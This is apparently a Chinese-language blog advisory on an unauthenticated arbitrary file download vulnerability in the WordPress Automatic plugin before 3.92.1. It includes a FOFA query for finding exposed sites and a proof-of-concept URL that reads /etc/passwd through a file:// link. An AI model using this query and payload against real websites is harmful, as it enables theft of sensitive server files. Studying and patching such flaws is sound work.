本文报道了WordPressAutomatic插件在3.92.1版本中的安全漏洞,攻击者可通过downloader.php文件下载任意文件,可能导致敏感数据泄露。漏洞复现可通过特定URL进行验证,提醒用户及时更新或修复。
声明:
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
简介
WordPress Automatic 插件<3.92.1易受未经验证的任意文件下载攻击。下载位置位于downloader.php文件中,允许攻击者从网站下载文件,导致敏感数据外泄。
影响版本:WordPress Automatic Plugin <3.92.1
资产搜索
fofa:
"/wp-content/plugins/wp-automatic"
漏洞复现
http://127.0.0.1/?p=1&wp_automatic=download&link=file:///etc/passwd 
get类型(为了好看就放上面的图,实际验证下面的就行)
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
